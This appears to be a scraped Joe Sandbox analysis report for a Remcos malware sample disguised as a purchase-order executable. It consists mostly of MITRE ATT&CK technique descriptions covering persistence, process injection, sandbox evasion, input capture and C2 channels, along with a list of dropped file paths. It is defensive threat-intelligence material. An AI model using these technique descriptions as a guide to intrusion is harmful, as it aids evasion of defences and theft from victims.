Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO-USC-22USC-KonchoCo.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\json[1].json

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aixlp5gq.pv0.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fligowqj.ueh.ps1

C:\Users\user\AppData\Local\Temp\nss8C29.tmp

C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin

C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Racialist.Pat

C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\PO-USC-22USC-KonchoCo.exe

C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\PO-USC-22USC-KonchoCo.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\refills.txt

C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\spejderlejrene.hum

Windows Analysis Report
PO-USC-22USC-KonchoCo.exe

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre